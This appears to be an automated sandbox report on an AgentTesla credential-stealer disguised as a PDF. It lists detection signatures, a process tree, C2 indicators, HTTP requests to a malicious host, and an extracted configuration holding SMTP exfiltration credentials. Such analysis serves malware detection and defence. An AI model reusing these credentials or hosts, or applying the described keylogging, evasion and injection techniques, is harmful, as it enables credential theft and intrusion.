
Analysis Report A4-058000200390-10-14_REV_pdf.exe

Overview

General Information

Sample Name: A4-058000200390-10-14_REV_pdf.exe
Analysis ID: 356536
MD5: 5af8f94a752ca9996fbfbf01dcc30edd
SHA1: b52d9ba9b7890e2b51e64ab889805cfce5126ebb
SHA256: b37d450b7d60fd2497ae794e9835b999339549406b1a05d92bb46a9f1a23eb12
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Startup

  • System is w10x64
  • A4-058000200390-10-14_REV_pdf.exe (PID: 7040 cmdline: 'C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe' MD5: 5AF8F94A752CA9996FBFBF01DCC30EDD)
    • cmd.exe (PID: 1364 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 2228 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 6300 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • NewApp.exe (PID: 2092 cmdline: 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe' MD5: 5AF8F94A752CA9996FBFBF01DCC30EDD)
    • cmd.exe (PID: 7132 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6576 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • NewApp.exe (PID: 6416 cmdline: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe MD5: 5AF8F94A752CA9996FBFBF01DCC30EDD)
    • WerFault.exe (PID: 4112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1956 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • NewApp.exe (PID: 1216 cmdline: 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe' MD5: 5AF8F94A752CA9996FBFBF01DCC30EDD)
    • cmd.exe (PID: 4488 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5032 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • NewApp.exe (PID: 1504 cmdline: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe MD5: 5AF8F94A752CA9996FBFBF01DCC30EDD)
    • WerFault.exe (PID: 1716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1868 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "EeCndWA", "URL: ": "http://2nUtGMgnxihCA8N2g.org", "To: ": "admin@soonlogistics.com", "ByHost: ": "mail.soonlogistics.com:587", "Password: ": "rLe4bkEV", "From: ": "admin@soonlogistics.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(12 entries in total; 5 shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
18.2.NewApp.exe.42f16b0.7.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
31.2.NewApp.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
18.2.NewApp.exe.42ac090.6.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(10 entries in total; 5 shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: A4-058000200390-10-14_REV_pdf.exe.1572.8.memstr, Malware Configuration Extractor: Agenttesla {"Username: ": "EeCndWA", "URL: ": "http://2nUtGMgnxihCA8N2g.org", "To: ": "admin@soonlogistics.com", "ByHost: ": "mail.soonlogistics.com:587", "Password: ": "rLe4bkEV", "From: ": "admin@soonlogistics.com"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe, ReversingLabs: Detection: 12%
Multi AV Scanner detection for submitted file
Source: A4-058000200390-10-14_REV_pdf.exe, ReversingLabs: Detection: 12%
Source: 31.2.NewApp.exe.400000.0.unpack, Avira: Label: TR/Spy.Gen8
Source: 24.2.NewApp.exe.400000.0.unpack, Avira: Label: TR/Spy.Gen8
Source: 8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpack, Avira: Label: TR/Spy.Gen8

Compliance:

Uses 32bit PE files
Source: A4-058000200390-10-14_REV_pdf.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: A4-058000200390-10-14_REV_pdf.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
                      Source: Binary string: .pdb8h source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbr source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.pdbrr source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbl.* source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: A4-058000200390-10-14_REV_pdf.PDBZ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: edputil.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: http://2nUtGMgnxihCA8N2g.org
Source: global traffic; TCP traffic: 192.168.2.4:49763 -> 103.17.211.69:587
Source: global traffic; HTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1 Host: coroloboxorozor.com
Source: global traffic; HTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1 Host: coroloboxorozor.com
Source: global traffic; HTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1 Host: coroloboxorozor.com
Source: Joe Sandbox View; IP Address: 104.21.71.230
Source: Joe Sandbox View; ASN Name: IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMY
Source: unknown; DNS traffic detected: queries for: coroloboxorozor.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe; Code function: 24_2_0643C37C SetWindowsHookExW 0000000D,00000000,?,?
Installs a global keyboard hook
Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe; Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe; Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697398308.00000000010AB000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe; Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe; Window created: window name: CLIPBRDWNDCLASS

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample; Static PE information: Filename: A4-058000200390-10-14_REV_pdf.exe
Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe; Code function: 0_2_00E992E0 NtSetInformationThread,
Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe; Code function: 0_2_00E9A031 NtSetInformationThread,
Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe; Code function: 18_2_02DD92E0 NtSetInformationThread,
Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe; Code function: 19_2_024192E0 NtSetInformationThread,
Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe; Code function: 19_2_0241A031 NtSetInformationThread,
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E3092
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E3D90
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 31_2_016E2FAF
                      Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588
                      Source: A4-058000200390-10-14_REV_pdf.exe | Static PE information: invalid certificate
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697398308.00000000010AB000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameOYSP IuQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706448464.0000000005B20000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706448464.0000000005B20000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.698714228.0000000003C29000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706578573.0000000005CF0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696808510.00000000008A6000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIGtzbNIQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.706664295.0000000005DD0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.913106033.000000000107A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920734902.0000000006790000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx.mui vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918507319.0000000005F40000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewbemdisp.tlbj% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.924161164.0000000006950000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000000.667116345.0000000000A56000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIGtzbNIQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.923915829.00000000068E0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.912393634.0000000000BE7000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920690884.0000000006780000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.912217696.0000000000448000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameOYSP IuQ.exe2 vs A4-058000200390-10-14_REV_pdf.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp | Binary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_7|
                      Source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Server
                      Source: NewApp.exe, 00000013.00000002.816014888.00000000009F0000.00000004.00000020.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@27/16@6/3
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File created: C:\Users\user\AppData\Roaming\NewApp
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7040
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2092
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1216
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD95.tmp
                      Source: A4-058000200390-10-14_REV_pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: A4-058000200390-10-14_REV_pdf.exe | ReversingLabs: Detection: 12%
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File read: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe 'C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe'
                      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknown | Process created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                      Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1956
                      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1868
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
